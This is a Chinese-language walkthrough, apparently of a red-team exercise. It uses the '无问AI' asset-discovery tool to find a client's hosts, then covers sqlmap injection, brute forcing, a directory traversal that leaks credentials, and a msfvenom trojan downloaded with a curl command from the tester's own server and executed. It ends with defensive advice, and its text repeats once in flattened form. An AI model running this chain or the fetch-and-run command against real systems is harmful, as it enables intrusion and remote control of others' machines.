记录一次hw使用无问AI收集资产
字数 1181 2025-08-29 08:30:06

使用无问AI进行资产收集与渗透测试实战教学

一、无问AI资产收集功能概述

无问AI是一款提供资产探测功能的AI工具,其资产收集能力包括:

  • 网站标题识别
  • URL链接收集
  • IP地址探测
  • 备案号查询
  • 隐藏系统发现

访问地址:http://chat.wwlib.cn/

二、资产收集实战步骤

1. 基础资产探测

  1. 访问无问AI平台
  2. 输入目标域名(如示例中的百度)
  3. 获取返回的资产信息,包括:
    • 网站标题
    • 相关链接
    • 对应IP地址
    • 备案信息

2. 客户资产深度收集

  1. 输入客户特定域名
  2. 分析返回结果,特别注意:
    • 非标准端口服务
    • 未备案系统
    • 开发人员私自上线的系统

三、渗透测试实战流程

1. 初步漏洞探测

  1. 弱口令测试

    • 尝试常见弱口令组合
    • 使用爆破工具(如Hydra)
  2. SQL注入测试

    • 使用sqlmap进行自动化检测
    • 首次失败后调整参数,指定数据类型
    • 成功识别时间注入漏洞

2. 注入漏洞利用

  1. 尝试--os-shell获取系统权限(本例中权限不足)
  2. 数据库信息提取:
    • 使用--dbs参数枚举数据库
    • 提取账号密码信息
    • 尝试登录后台系统

3. 上传点突破

  1. 寻找文件上传功能
  2. 尝试绕过防护:
    • 白名单绕过技术
    • 文件头伪造
    • 扩展名欺骗
      (本例中未能成功绕过)

4. 端口与服务探测

  1. 发现6886端口的目录遍历漏洞
  2. 通过遍历下载web.rar文件
  3. 分析配置文件获取数据库凭证

5. 权限获取与维持

  1. 使用msfvenom生成木马文件
  2. 搭建公网HTTP服务(Python简易服务器)
  3. 利用目标系统curl命令下载木马
    python -m http.server 80
    
  4. 在目标系统执行:
    curl http://your-server/shell.exe -o shell.exe && shell.exe
    
  5. 使用Metasploit开启监听并获取shell

四、关键技术与工具总结

  1. 资产收集工具

    • 无问AI(核心推荐)
    • 其他可选:FOFA、Shodan、ZoomEye
  2. 渗透测试工具链

    • sqlmap:自动化SQL注入检测与利用
    • Metasploit:漏洞利用框架
    • Hydra:密码爆破工具
    • Python HTTP Server:简易文件传输
  3. 常见漏洞类型

    • SQL注入(特别是时间盲注)
    • 目录遍历
    • 配置信息泄露
    • 未授权访问

五、防御建议

  1. 资产层面

    • 建立完整的资产清单
    • 定期扫描未备案系统
    • 监控非标准端口服务
  2. 漏洞防护

    • 参数化查询防止SQL注入
    • 上传文件严格校验
    • 敏感配置文件加密存储
  3. 权限控制

    • 最小权限原则
    • 命令执行限制
    • 网络出口过滤

六、学习资源推荐

  1. Web安全:

    • OWASP Top 10
    • Web应用安全测试指南
  2. 渗透测试:

    • Metasploit实战指南
    • Kali Linux工具集
  3. 持续学习:

    • FreeBuf安全社区
    • 漏洞银行平台
    • CTF竞赛参与

通过本案例可见,无问AI在资产收集阶段表现出色,能够帮助安全人员发现传统扫描可能遗漏的系统,为后续渗透测试提供坚实基础。建议安全从业者掌握此类AI工具与传统工具的结合使用,提升工作效率。

使用无问AI进行资产收集与渗透测试实战教学 一、无问AI资产收集功能概述 无问AI是一款提供资产探测功能的AI工具,其资产收集能力包括: 网站标题识别 URL链接收集 IP地址探测 备案号查询 隐藏系统发现 访问地址:http://chat.wwlib.cn/ 二、资产收集实战步骤 1. 基础资产探测 访问无问AI平台 输入目标域名(如示例中的百度) 获取返回的资产信息,包括: 网站标题 相关链接 对应IP地址 备案信息 2. 客户资产深度收集 输入客户特定域名 分析返回结果,特别注意: 非标准端口服务 未备案系统 开发人员私自上线的系统 三、渗透测试实战流程 1. 初步漏洞探测 弱口令测试 : 尝试常见弱口令组合 使用爆破工具(如Hydra) SQL注入测试 : 使用sqlmap进行自动化检测 首次失败后调整参数,指定数据类型 成功识别时间注入漏洞 2. 注入漏洞利用 尝试--os-shell获取系统权限(本例中权限不足) 数据库信息提取: 使用--dbs参数枚举数据库 提取账号密码信息 尝试登录后台系统 3. 上传点突破 寻找文件上传功能 尝试绕过防护: 白名单绕过技术 文件头伪造 扩展名欺骗 (本例中未能成功绕过) 4. 端口与服务探测 发现6886端口的目录遍历漏洞 通过遍历下载web.rar文件 分析配置文件获取数据库凭证 5. 权限获取与维持 使用msfvenom生成木马文件 搭建公网HTTP服务(Python简易服务器) 利用目标系统curl命令下载木马 在目标系统执行: 使用Metasploit开启监听并获取shell 四、关键技术与工具总结 资产收集工具 : 无问AI(核心推荐) 其他可选:FOFA、Shodan、ZoomEye 渗透测试工具链 : sqlmap:自动化SQL注入检测与利用 Metasploit:漏洞利用框架 Hydra:密码爆破工具 Python HTTP Server:简易文件传输 常见漏洞类型 : SQL注入(特别是时间盲注) 目录遍历 配置信息泄露 未授权访问 五、防御建议 资产层面 : 建立完整的资产清单 定期扫描未备案系统 监控非标准端口服务 漏洞防护 : 参数化查询防止SQL注入 上传文件严格校验 敏感配置文件加密存储 权限控制 : 最小权限原则 命令执行限制 网络出口过滤 六、学习资源推荐 Web安全: OWASP Top 10 Web应用安全测试指南 渗透测试: Metasploit实战指南 Kali Linux工具集 持续学习: FreeBuf安全社区 漏洞银行平台 CTF竞赛参与 通过本案例可见,无问AI在资产收集阶段表现出色,能够帮助安全人员发现传统扫描可能遗漏的系统,为后续渗透测试提供坚实基础。建议安全从业者掌握此类AI工具与传统工具的结合使用,提升工作效率。